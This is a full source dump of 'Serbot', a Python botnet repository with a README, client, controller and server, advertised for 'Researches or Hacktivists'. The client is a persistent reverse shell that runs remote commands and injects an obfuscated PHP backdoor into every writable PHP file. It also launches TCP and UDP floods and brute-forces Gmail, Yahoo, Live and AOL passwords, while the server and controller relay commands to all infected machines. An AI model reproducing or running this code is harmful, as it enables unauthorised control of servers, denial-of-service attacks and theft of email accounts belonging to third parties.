├── LICENSE.md ├── README.md ├── client.py ├── controller.py └── server.py /LICENSE.md: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 dotcppfile 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, publish, distribute the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 6 | 7 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 8 | 9 | This Software will be used for Educational and Professional Purposes Only. We/the Developers are not responsible for any loss or damage caused by this Software, use it at your own risk. 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Hello everyone, 2 | 3 | ![alt tag](http://i.imgur.com/L7RQlzv.png) 4 | ![alt tag](http://i.imgur.com/YQ81qSZ.png) 5 | 6 | Serbot is hot, keep reading Lol. 7 | 8 | So, lets just get to the point, I’ve showed you [Awrs](http://dotcppfile.wordpress.com/2014/11/03/awrs-advanced-clientserver-windowslinux-python-reverse-shell/) and what it’s capable of, considered as one of the best Reverse Shells I’ve decided to Update Awrs and create Serbot and no, it’s not what you think Lol. 9 | 10 | Serbot is an advanced version of Awrs where the Server can be managed by 1 Controller at a time. 11 | ######Example: 12 | Server hosted on 15.48.158.15 and accepts up to 100 clients through port 1567, accepts 1 Controller at a time through port 2357 and the Controller’s functions are protected with a password: “IAmAPassword” 13 | Client 1 hosted on 86.58.157.25 connected to 15.48.158.15:1567 14 | Client 2 hosted on 78.459.17.35 connected to 15.48.158.15:1567 15 | Controller running on my own computer connected to the Server on 15.48.158.15:2357 using the valid password “IAmAPassword” 16 | 17 | In Serbot’s case, the Server also plays the role of a Bridge between the Clients and the Controller. This should sum things up. There’s a lot of benefits out of this now that’s for sure. A team of Researches or Hacktivists can now interact with all their clients using their Controllers, they don’t have to worry about portforwading, reverse shell’s stability and speed etc and they’re all sharing everything they have control on in one place. 18 | 19 | In Serbot, everything was dealt with, your Server will never crash nor will your Clients no matter what, check the features list below for more info: 20 | 21 | #####Server: 22 | 1. Linux/Windows Version. 23 | 1. Multi Handler. Can handle multiple connections all at once. 24 | 1. Bridge. Plays also the roll of a Bridge between the Clients and the Controller. 25 | 1. The Controller’s connection requires a plain text password, it’s not the best but it’s more than enough when it comes to keeping “l337 hax0rz b0t tak30v3r” away. 26 | 1. Accepts only 1 Controller at a time. 27 | 1. Kicks the Controller after 5 mins. This was added just in case someone forgot his Controller on which won’t allow other controllers to connect (since the Server only accepts 1 controller at a time). 28 | 1. Uses a very small amount of CPU and RAM when running. 29 | 1. Fast and Stable. 30 | 31 | #####Client: 32 | 1. Linux Version. 33 | 1. Backdooring Function. (For more info: https://github.com/dotcppfile/Serbot/releases/tag/18%2F2%2F2015) 34 | 1. TCP Flood. 35 | 1. UDP Flood. 36 | 1. Gmail Bruteforcer. (Workaround gmail's SMTP login) 37 | 1. Live Bruteforcer. 38 | 1. Yahoo Bruteforcer. 39 | 1. AOL Bruteforce. 40 | 1. Custome SMTP Bruteforcer. 41 | (if found, the password will be saved in "password.txt" client-side) 42 | 1. Self Update. 43 | 1. You’ll never lose your shell. (No Output, Wrong, Interactive and Infinite commands won’t kill your shell) 44 | 1. Can handle commands like: mkdir whatever; cd whatever. 45 | 1. Never closes and is always trying to connect to the Server. 46 | 1. Can handle any command properly, such as the cd command. 47 | 1. Always gets back a response. (Command Output or Simple Client response) 48 | 1. Uses a very small amount of CPU and RAM when running. 49 | 1. Fast and Stable. 50 | 51 | #####Controller: 52 | 1. Linux/Windows Version. 53 | 1. Handles all commands perfectly. 54 | 1. Handles any stupidity (KeyboardInterrupts, empty commands, etc) perfectly. 55 | 1. Uses a very small amount of CPU and RAM when running. 56 | 1. Easy user interface. 57 | 1. Fast and Stable. 58 | 59 | This list isn’t enough but that’s all that I can think of right now. If you want to know how stable Serbot is then you have to try and code something similar to it Lol because then you’ll know that it handles everything you’re facing when it comes to bugs, errors, commands etc… 60 | 61 | You simply have to remove the “#!/usr/bin/env python2″ at the top of every script to get this up and running on windows. 62 | 63 | #####Extra: 64 | If you’re trying to activate the Client through ssl, shell or web shell then you have to run the client.py in another process in the background or else your shell will dive into an endless loop and the best way to do that in Linux would be using nohup. 65 | 66 | ######Example: 67 | nohup python client.py 15.48.158.15 1567 > /dev/null & 68 | 69 | nohup python client.py 15.48.158.15 1567 > /dev/null 2>&1 & 70 | 71 | Greetings to Team Prophetic, Chaoshackerz and all the followers of https://dotcppfile.wordpress.com/, 72 | That’s all, 73 | dotcppfile. 74 | -------------------------------------------------------------------------------- /client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import subprocess, os, sys, time, threading, signal, smtplib, random, fnmatch 4 | from socket import * 5 | from threading import Thread 6 | 7 | if (len(sys.argv) == 3): 8 | host = sys.argv[1] 9 | port = int(sys.argv[2]) 10 | else: 11 | sys.exit("Usage: client.py ") 12 | 13 | #Used to make sure a subprocess lasts 30 seconds max--> 14 | class Alarm(Exception): 15 | pass 16 | 17 | def alarm_handler(signum, frame): 18 | raise Alarm 19 | #<-- 20 | 21 | #Used by the Bruteforcer--> 22 | def product(*args, **kwds): 23 | pools = map(tuple, args) * kwds.get('repeat', 1) 24 | result = [[]] 25 | for pool in pools: 26 | result = [x+[y] for x in result for y in pool] 27 | for prod in result: 28 | yield tuple(prod) 29 | 30 | def repeat(object, times=None): 31 | if times is None: 32 | while True: 33 | yield object 34 | else: 35 | for i in xrange(times): 36 | yield object 37 | #<-- 38 | 39 | #Self Update--> 40 | temporary = """ 41 | #!/usr/bin/env python2 42 | import os, urllib2 43 | 44 | response = urllib2.urlopen('https://raw.githubusercontent.com/dotcppfile/Serbot/master/client.py') 45 | html = response.read() 46 | 47 | os.system("kill %s") 48 | 49 | f = open("%s", "w") 50 | f.write(html) 51 | f.close() 52 | 53 | os.system("nohup python %s %s %s > /dev/null 2>&1 &") 54 | """ % (os.getpid(), os.path.realpath(__file__), os.path.realpath(__file__), host, port) 55 | 56 | def selfUpdate(): 57 | while 1: 58 | filename = "%d.py" % random.randint(1, 1000) 59 | if (not os.path.exists(filename)): 60 | break 61 | 62 | f = open(filename, "w") 63 | f.write(temporary) 64 | f.close() 65 | 66 | os.system("nohup python %s > /dev/null 2>&1 &" % (filename)) 67 | #<-- 68 | 69 | #PHP Infector--> 70 | backdoor = """ 71 | 76 | $base64ids = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/"); 77 | 78 | function binToDec($string) 79 | { 80 | $decimal = ""; 81 | for($i = 0; $i 201 | function sh3ll_this($string) 202 | { 203 | $key = "dotcppfile"; 204 | $outText = ''; 205 | 206 | for($i=0;$i 248 | function evalRel($command, $id) 249 | { 250 | global $shell_exec, $exec, $popen, $proc_open, $system, $passthru; 251 | if (($system == True) && ($id == 2)) 252 | { 253 | system($command); 254 | } 255 | else if(($passthru == True) && ($id == 2)) 256 | { 257 | passthru($command); 258 | } 259 | else if($shell_exec == True) 260 | { 261 | return shell_exec($command); 262 | } 263 | else if($exec == True) 264 | { 265 | return exec($command); 266 | } 267 | else if($popen == True) 268 | { 269 | $pid = popen( $command,"r"); 270 | while(!feof($pid)) 271 | { 272 | return fread($pid, 256); 273 | flush(); 274 | ob_flush(); 275 | usleep(100000); 276 | } 277 | pclose($pid); 278 | } 279 | else if($proc_open == True) 280 | { 281 | $process = proc_open( 282 | $command, 283 | array( 284 | 0 => array("pipe", "r"), //STDIN 285 | 1 => array("pipe", "w"), //STDOUT 286 | 2 => array("pipe", "w"), //STDERR 287 | ), 288 | $pipes 289 | ); 290 | 291 | if ($process !== false) 292 | { 293 | $stdout = stream_get_contents($pipes[1]); 294 | $stderr = stream_get_contents($pipes[2]); 295 | fclose($pipes[1]); 296 | fclose($pipes[2]); 297 | proc_close($process); 298 | } 299 | 300 | if ($stderr != "") 301 | { 302 | return $stderr; 303 | } 304 | else 305 | { 306 | return $stdout; 307 | } 308 | } 309 | else 310 | { 311 | return "False"; 312 | } 313 | } 314 | #<-- 315 | 316 | #Dynamic Booleans (True=Enabled/False=Disabled)--> 317 | $php_functions = array("exec", "shell_exec", "passthru", "system", "popen", "proc_open"); 318 | foreach($php_functions as $function) 319 | { 320 | if(checkIt($function)) 321 | { 322 | ${"{$function}"} = True; 323 | } 324 | else 325 | { 326 | ${"{$function}"} = False; 327 | } 328 | } 329 | #<-- 330 | 331 | $checker = evalRel("ps aux | grep '%s %s'", 1); 332 | 333 | if (strpos($checker, "python") === False) 334 | { 335 | evalRel("nohup python %s %s %s > /dev/null 2>&1 &", 2); 336 | } 337 | ?> 338 | """ % (host, port, os.path.realpath(__file__), host, port) 339 | 340 | def find_files(directory, pattern): 341 | for root, dirs, files in os.walk(directory): 342 | for basename in files: 343 | if fnmatch.fnmatch(basename, pattern): 344 | filename = os.path.join(root, basename) 345 | yield filename 346 | 347 | def debackdoor(thedir): 348 | allphp = find_files(thedir, '*.php') 349 | 350 | for thefile in allphp: 351 | if ((os.access(thefile, os.R_OK)) and (os.access(thefile, os.W_OK))): 352 | f = open(thefile, "r") 353 | inside = f.read() 354 | f.close() 355 | 356 | if ("#This is a Serbot property" not in inside): 357 | alllines = inside.split('\n') 358 | if (alllines[len(alllines)-1] != "?>"): 359 | global backdoor 360 | backdoor = "?>\n%s" % backdoor 361 | 362 | f = open(thefile, "a") 363 | f.write(backdoor) 364 | f.close() 365 | 366 | def rmbackdoor(thedir): 367 | allphp = find_files(thedir, '*.php') 368 | 369 | for thefile in allphp: 370 | if ((os.access(thefile, os.R_OK)) and (os.access(thefile, os.W_OK))): 371 | f = open(thefile, "r") 372 | inside = f.read() 373 | f.close() 374 | 375 | if ("#This is a Serbot property" in inside): 376 | inside = inside.replace(backdoor, "") 377 | f = open(thefile, "w") 378 | f.write(inside) 379 | f.close() 380 | #<-- 381 | 382 | def savePass(password): 383 | f = open("password.txt", "w") 384 | f.write(password) 385 | f.close() 386 | 387 | def gmailbruteforce(email, combination, minimum, maximum): 388 | smtpserver = smtplib.SMTP("smtp.gmail.com",587) 389 | smtpserver.starttls() 390 | smtpserver.ehlo() 391 | 392 | found = False 393 | 394 | for n in range(minimum, maximum+1): 395 | if (found == False): 396 | for w in product(combination,repeat=n): 397 | word = ''.join(w) 398 | try: 399 | smtpserver.login(email, password) 400 | except(smtplib.SMTPAuthenticationError), msg: 401 | if "Please Log" in str(msg): 402 | savePass(password) 403 | found = True 404 | break 405 | else: 406 | break 407 | 408 | def custombruteforce(address, port, email, combination, minimum, maximum): 409 | smtpserver = smtplib.SMTP(address,int(port)) 410 | smtpserver.starttls() 411 | smtpserver.ehlo() 412 | 413 | found = False 414 | 415 | for n in range(minimum, maximum+1): 416 | if (found == False): 417 | for w in product(combination,repeat=n): 418 | word = ''.join(w) 419 | try: 420 | smtpserver.login(email, password) 421 | savePass(password) 422 | found = True 423 | break 424 | except: 425 | pass 426 | else: 427 | break 428 | 429 | class udpFlood(threading.Thread): 430 | def __init__ (self, victimip, victimport): 431 | threading.Thread.__init__(self) 432 | self.victimip = victimip 433 | self.victimport = victimport 434 | 435 | def run(self): 436 | timeout = time.time() + 60 437 | while True: 438 | test = 0 439 | if (time.time() <= timeout): 440 | s = socket(AF_INET, SOCK_DGRAM) 441 | s.connect((self.victimip, int(self.victimport))) 442 | s.send('A' * 65000) 443 | else: 444 | break 445 | 446 | class tcpFlood(threading.Thread): 447 | def __init__ (self, victimip, victimport): 448 | threading.Thread.__init__(self) 449 | self.victimip = victimip 450 | self.victimport = victimport 451 | 452 | def run(self): 453 | timeout = time.time() + 60 454 | while True: 455 | test = 0 456 | if (time.time() <= timeout): 457 | s = socket(AF_INET, SOCK_STREAM) 458 | s.settimeout(1) 459 | s.connect((self.victimip, int(self.victimport))) 460 | s.send('A' * 65000) 461 | else: 462 | break 463 | 464 | def udpUnleach(victimip, victimport): 465 | threads = [] 466 | for i in range(1, 21): 467 | thread = udpFlood(victimip, victimport) 468 | thread.start() 469 | threads.append(thread) 470 | 471 | for thread in threads: 472 | thread.join() 473 | 474 | def tcpUnleach(victimip, victimport): 475 | threads = [] 476 | for i in range(1, 21): 477 | thread = tcpFlood(victimip, victimport) 478 | thread.start() 479 | threads.append(thread) 480 | 481 | for thread in threads: 482 | thread.join() 483 | 484 | def main(host, port): 485 | while 1: 486 | connected = False 487 | while 1: 488 | while (connected == False): 489 | try: 490 | s=socket(AF_INET, SOCK_STREAM) 491 | s.connect((host,port)) 492 | print "[INFO] Connected" 493 | connected = True 494 | except: 495 | time.sleep(5) 496 | 497 | try: 498 | msg=s.recv(20480) 499 | allofem = msg.split(";") 500 | for onebyone in allofem: #This your happy day one liners 501 | commands = onebyone.split( ) 502 | if (commands[0] == "cd"): 503 | os.chdir(commands[1]) 504 | s.send(os.getcwd()) 505 | print "[INFO] Changed dir to %s" % os.getcwd() 506 | elif (commands[0] == "selfupdateall"): 507 | selfUpdate() 508 | return None 509 | elif (commands[0] == "serbackdoor"): 510 | try: 511 | debackdoor(commands[1]) 512 | s.send("[CLIENT] Backdoored\n") 513 | except: 514 | s.send("[CLIENT] Wrong arguments\n") 515 | elif (commands[0] == "rmbackdoor"): 516 | try: 517 | rmbackdoor(commands[1]) 518 | s.send("[CLIENT] Malicious PHP Code Removed\n") 519 | except: 520 | s.send("[CLIENT] Wrong arguments\n") 521 | elif (commands[0] == "udpflood"): 522 | try: 523 | udpinfo = commands[1].split(":") 524 | t = Thread(None,udpUnleach,None,(udpinfo[0], udpinfo[1])) 525 | t.start() 526 | s.send("[CLIENT] Flooding started\n") 527 | except: 528 | s.send("[CLIENT] Failed to start Flooding\n") 529 | pass 530 | elif (commands[0] == "udpfloodall"): 531 | try: 532 | udpinfo = commands[1].split(":") 533 | t = Thread(None,udpUnleach,None,(udpinfo[0], udpinfo[1])) 534 | t.start() 535 | except: 536 | pass 537 | elif (commands[0] == "tcpflood"): 538 | try: 539 | tcpinfo = commands[1].split(":") 540 | t = Thread(None,tcpUnleach,None,(tcpinfo[0], tcpinfo[1])) 541 | t.start() 542 | s.send("[INFO] Flooding started\n") 543 | except: 544 | s.send("[ERROR] Failed to start Flooding\n") 545 | pass 546 | elif (commands[0] == "tcpfloodall"): 547 | try: 548 | tcpinfo = commands[1].split(":") 549 | t = Thread(None,tcpUnleach,None,(tcpinfo[0], tcpinfo[1])) 550 | t.start() 551 | except: 552 | pass 553 | elif (commands[0] == "gmailbruteforce"): 554 | try: 555 | bruteinfo = commands[1].split(":") 556 | t = Thread(None,gmailbruteforce,None,(bruteinfo[0], bruteinfo[1], bruteinfo[2], bruteinfo[3])) 557 | t.start() 558 | s.send("[CLIENT] Bruteforcing started\n") 559 | except: 560 | s.send("[CLIENT] Wrong arguments\n") 561 | elif (commands[0] == "livebruteforce"): 562 | try: 563 | bruteinfo = commands[1].split(":") 564 | t = Thread(None,custombruteforce,None,("smtp.live.com", 587, bruteinfo[0], bruteinfo[1], bruteinfo[2], bruteinfo[3])) 565 | t.start() 566 | s.send("[CLIENT] Bruteforcing started\n") 567 | except: 568 | s.send("[CLIENT] Wrong arguments\n") 569 | elif (commands[0] == "yahoobruteforce"): 570 | try: 571 | bruteinfo = commands[1].split(":") 572 | t = Thread(None,custombruteforce,None,("smtp.mail.yahoo.com", 587, bruteinfo[0], bruteinfo[1], bruteinfo[2], bruteinfo[3])) 573 | t.start() 574 | s.send("[CLIENT] Bruteforcing started\n") 575 | except: 576 | s.send("[CLIENT] Wrong arguments\n") 577 | elif (commands[0] == "aolbruteforce"): 578 | try: 579 | bruteinfo = commands[1].split(":") 580 | t = Thread(None,custombruteforce,None,("smtp.aol.com", 587, bruteinfo[0], bruteinfo[1], bruteinfo[2], bruteinfo[3])) 581 | t.start() 582 | s.send("[CLIENT] Bruteforcing started\n") 583 | except: 584 | s.send("[CLIENT] Wrong arguments\n") 585 | elif (commands[0] == "custombruteforce"): 586 | try: 587 | bruteinfo = commands[1].split(":") 588 | address, port, email, combination, minimum, maximum = msg.split(":") 589 | t = Thread(None,custombruteforce,None,(bruteinfo[0], bruteinfo[1], bruteinfo[2], bruteinfo[3], bruteinfo[4], bruteinfo[5])) 590 | t.start() 591 | s.send("[CLIENT] Bruteforcing started\n") 592 | except: 593 | s.send("[CLIENT] Wrong arguments\n") 594 | elif (commands[0] == "hellows123"): 595 | s.send(os.getcwd()) 596 | elif (commands[0] == "quit"): 597 | s.close() 598 | print "[INFO] Connection Closed" 599 | break 600 | else: 601 | thecommand = ' '.join(commands) 602 | comm = subprocess.Popen(thecommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 603 | signal.signal(signal.SIGALRM, alarm_handler) 604 | signal.alarm(30) 605 | try: 606 | STDOUT, STDERR = comm.communicate() 607 | en_STDERR = bytearray(STDERR) 608 | en_STDOUT = bytearray(STDOUT) 609 | if (en_STDERR == ""): 610 | if (en_STDOUT != ""): 611 | print en_STDOUT 612 | s.send(en_STDOUT) 613 | else: 614 | s.send("[CLIENT] Command Executed") 615 | else: 616 | print en_STDERR 617 | s.send(en_STDERR) 618 | except Alarm: 619 | comm.terminate() 620 | comm.kill() 621 | s.send("[CLIENT] 30 Seconds Exceeded - SubProcess Killed\n") 622 | signal.alarm(0) 623 | except KeyboardInterrupt: 624 | s.close() 625 | print "[INFO] Connection Closed" 626 | break 627 | except: 628 | s.close() 629 | print "[INFO] Connection Closed" 630 | break 631 | 632 | while 1: 633 | try: 634 | main(host, port) 635 | except: 636 | time.sleep(5) 637 | -------------------------------------------------------------------------------- /controller.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import subprocess, os, sys, time, threading 4 | from socket import * 5 | 6 | intro = """ 7 | ____ ____ ____ ____ ____ ____ 8 | ||S |||e |||r |||b |||o |||t || 9 | ||__|||__|||__|||__|||__|||__|| 10 | |/__\|/__\|/__\|/__\|/__\|/__\| 11 | 12 | Coded by: dotcppfile 13 | Twitter: https://twitter.com/dotcppfile 14 | Blog: http://dotcppfile.worpdress.com 15 | """ 16 | 17 | commands = """ 18 | 19 | Primary: 20 | -------- 21 | accept | Accept connections 22 | list | List connections 23 | clear | Clear the console 24 | quit | Close all connections and quit 25 | credits | Show Credits 26 | help | Show this message 27 | 28 | Client Interaction: 29 | ------------------- 30 | interact | Interact with client 31 | stop | Stop interacting with client 32 | udpflood : | UDP flood threw client 33 | tcpflood : | TCP flood threw client 34 | serbackdoor | Infects all PHP Pages with Malicious Code that will run the Serbot Client (if killed) again 35 | rmbackdoor | Removes the Malicious PHP Code 36 | 37 | Wide Commands: 38 | -------------- 39 | udpfloodall : | Same as `udpflood` but for All clients 40 | tcpfloodall : | Same as `tcpflood` but for All clients 41 | selfupdateall | Update all Clients with the new version from Github 42 | 43 | Bruteforce: 44 | ----------- 45 | gmailbruteforce ::: 46 | yahoobruteforce ::: 47 | livebruteforce ::: 48 | aolbruteforce ::: 49 | Example: gmailbruteforce someone@gmail.com:0123456789:6:8 50 | custombruteforce
::::: 51 | Example: custombruteforce smtp.whatever.com:587:something@whatever.com:abcdefghi:4:6 52 | 53 | \n""" 54 | 55 | if (len(sys.argv) == 4): 56 | host = sys.argv[1] 57 | port = int(sys.argv[2]) 58 | password = sys.argv[3] 59 | else: 60 | sys.exit("Usage: client.py ") 61 | 62 | def main(): 63 | print intro 64 | try: 65 | s=socket(AF_INET, SOCK_STREAM) 66 | s.connect((host,port)) 67 | except: 68 | sys.exit("[ERROR] Can't connect to server") 69 | 70 | s.send(password) 71 | 72 | while 1: 73 | command = raw_input("> ") 74 | try: 75 | if (command == "accept"): 76 | s.send("accept") 77 | print s.recv(20480) 78 | elif (command == "list"): 79 | s.send("list") 80 | print s.recv(20480) 81 | elif ("interact " in command): 82 | s.send(command) 83 | temporary = s.recv(20480) 84 | if ("ERROR" not in temporary): 85 | victimpath = s.recv(20480) 86 | if ("ERROR" not in victimpath): 87 | breakit = False 88 | while (breakit == False): 89 | msg = raw_input(victimpath) 90 | allofem = msg.split(";") 91 | for onebyone in allofem: #This your happy day one liners 92 | if (onebyone == "stop"): 93 | s.send("stop") 94 | print "\n" 95 | breakit = True 96 | elif ("cd " in onebyone): 97 | s.send(onebyone) 98 | victimpath = s.recv(20480) 99 | if ("ERROR" in victimpath): 100 | print victimpath 101 | breakit = True 102 | elif (onebyone == ""): 103 | print "[CONTROLLER] Nothing to be sent...\n" 104 | else: 105 | s.send(onebyone) 106 | print s.recv(20480) 107 | else: 108 | print victimpath 109 | break 110 | else: 111 | print temporary 112 | elif (("udpfloodall " in command) or ("tcpfloodall " in command)): 113 | s.send(command) 114 | print "\n" 115 | elif (command == "selfupdateall"): 116 | s.send("selfupdateall") 117 | print "\n" 118 | elif(command == "clear"): 119 | if sys.platform == 'win32': 120 | os.system("cls") 121 | else: 122 | os.system("clear") 123 | elif(command == "quit"): 124 | s.send("quit") 125 | s.close() 126 | break 127 | elif(command == "help"): 128 | print commands 129 | elif(command == "credits"): 130 | print "--------\nCredits:\n--------\nCoded by: dotcppfile\nTwitter: https://twitter.com/dotcppfile\nBlog: http://dotcppfile.worpdress.com\n" 131 | else: 132 | print "[CONTROLLER] Invalid Command\n" 133 | except KeyboardInterrupt: 134 | try: 135 | s.send("quit") 136 | s.close() 137 | print "" 138 | break 139 | except: 140 | pass 141 | except: 142 | print "[CONTROLLER] Connection Closed" 143 | s.close() 144 | break 145 | 146 | main() 147 | -------------------------------------------------------------------------------- /server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import os, sys, time 4 | from socket import * 5 | 6 | if (len(sys.argv) == 4): 7 | port = int(sys.argv[1]) 8 | bridgeport = int(sys.argv[2]) 9 | password = sys.argv[3] 10 | else: 11 | sys.exit("Usage: server.py ") 12 | 13 | intro = """ 14 | ____ ____ ____ ____ ____ ____ 15 | ||S |||e |||r |||b |||o |||t || 16 | ||__|||__|||__|||__|||__|||__|| 17 | |/__\|/__\|/__\|/__\|/__\|/__\| 18 | 19 | Coded by: dotcppfile 20 | Twitter: https://twitter.com/dotcppfile 21 | Blog: http://dotcppfile.worpdress.com" 22 | """ 23 | 24 | s=socket(AF_INET, SOCK_STREAM) 25 | s.settimeout(5) #5 seconds are given for every operation by socket `s` 26 | s.bind(("0.0.0.0",port)) 27 | s.listen(5) 28 | 29 | bridge=socket(AF_INET, SOCK_STREAM) 30 | bridge.bind(("0.0.0.0",bridgeport)) 31 | bridge.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 32 | 33 | allConnections = [] 34 | allAddresses = [] 35 | 36 | #Close all Connections--> 37 | def quitClients(): 38 | for item in allConnections: 39 | try: 40 | item.send("exit") 41 | item.close() 42 | except: #Connection already closed 43 | pass 44 | 45 | del allConnections[:] 46 | del allAddresses[:] 47 | #<-- 48 | 49 | #Get Client Connections--> 50 | def getConnections(): 51 | quitClients() 52 | 53 | while 1: 54 | try: 55 | q,addr=s.accept() #Lasts 5 seconds and then Exception is raised 56 | q.setblocking(1) #Every new socket has no timeout; every operation takes its time. 57 | allConnections.append(q) #Holding our New Connections/Sockets 58 | allAddresses.append(addr) 59 | except: #Time's up 60 | break 61 | #<-- 62 | 63 | #Proper Sending to Controller--> 64 | def sendController(msg, q): 65 | try: 66 | q.send(msg) 67 | return 1 #success 68 | except: return 0 #fail 69 | #<-- 70 | 71 | def main(): 72 | while 1: 73 | bridge.listen(0) #There is no Queue; no one waits, 1 valid controller connection or nothing. 74 | q,addr=bridge.accept() 75 | 76 | cpass = q.recv(20480) 77 | 78 | if (cpass == password): loginsucc=True 79 | else: loginsucc=False 80 | 81 | timeout = time.time() + 500 #A Controller can't stay here forever, only 5 minutes are given. He should connect back if needed. This is added incase a Controller forgot to close the connection himself and went out on a date... 82 | 83 | breakit = False 84 | while 1: 85 | if (loginsucc == False): break #Wrong Pass; the controller gets kicked 86 | 87 | if ((time.time() > timeout) or (breakit == True)): break #5 minutes passed; the controller gets kicked 88 | 89 | try: command = q.recv(20480) 90 | except: break #Get back to the top if we can't recieve the command; we wait again for a new Controller (same for everything that comes next) 91 | 92 | if (command == "accept"): 93 | getConnections() 94 | if (sendController("[SERVER] Done Accepting\n", q) == 0): break #Get back to the top if we can't send to the controller; we wait again for a new controller (same for everything that comes next) 95 | 96 | elif(command == "list"): 97 | temporary = "" 98 | for item in allAddresses: temporary += "%d - %s|%s\n" % (allAddresses.index(item) + 1, str(item[0]), str(item[1])) 99 | if (temporary != ""): 100 | if (sendController(temporary, q) == 0): break 101 | else: 102 | if (sendController("[SERVER] No clients\n", q) == 0): break 103 | 104 | elif("interact " in command): 105 | chosenone = int(command.replace("interact ","")) - 1 106 | if ((chosenone < len(allAddresses)) and (chosenone >= 0 )): 107 | if (sendController("[SERVER] Interacting with %s\n" % str(allAddresses[chosenone]), q) == 0): break 108 | 109 | try: 110 | allConnections[chosenone].send("hellows123") 111 | vtpath = allConnections[chosenone].recv(20480) + "> " 112 | 113 | if (sendController(vtpath, q) == 0): break 114 | 115 | while 1: 116 | if (time.time() > timeout): #5 minutes passed, we set `breakit` to true and go back to the top 117 | breakit = True 118 | break 119 | 120 | try: data=q.recv(20480) #Recieves command 121 | except: 122 | breakit = True 123 | break 124 | 125 | try: #Pass it out to Client and Send back the Response 126 | if ("cd " in data): 127 | allConnections[chosenone].send(data) 128 | msg=allConnections[chosenone].recv(20480) 129 | vtpath = msg + "> " 130 | if (sendController(vtpath, q) == 0): 131 | breakit = True 132 | break 133 | elif (data == "stop"): break #We stop interacting and wait for another command 134 | else: 135 | allConnections[chosenone].send(data) 136 | msg=allConnections[chosenone].recv(20480) 137 | if (sendController(msg, q) == 0): 138 | breakit = True 139 | break 140 | except: 141 | if (sendController("[SERVER - ERROR] Client closed the connection\n[INFO] Retreiving connections again...\n", q) == 0): 142 | breakit = True 143 | break 144 | break 145 | except: 146 | if (sendController("[SERVER - ERROR] Client closed the connection\n[INFO] Retreiving connections again...\n", q) == 0):break 147 | getConnections() 148 | else: 149 | if (sendController("[SERVER - ERROR] Client doesn't exist\n", q) == 0): break 150 | 151 | elif ("udpfloodall " in command or "tcpfloodall " in command): 152 | for item in allConnections: 153 | try: 154 | item.send(command) 155 | except: 156 | pass 157 | elif (command == "selfupdateall"): 158 | for item in allConnections: 159 | try: 160 | item.send(command) 161 | except: 162 | pass 163 | 164 | elif(command == "quit"): 165 | quitClients() 166 | q.close() 167 | break 168 | else: 169 | if (sendController("[SERVER - ERROR] Invalid Command\n", q) == 0): break 170 | 171 | while 1: 172 | try: 173 | main() 174 | except KeyboardInterrupt: 175 | quitClients() 176 | except: 177 | quitClients() 178 | 179 | time.sleep(5) #Wait 5 Seconds before we start again 180 | --------------------------------------------------------------------------------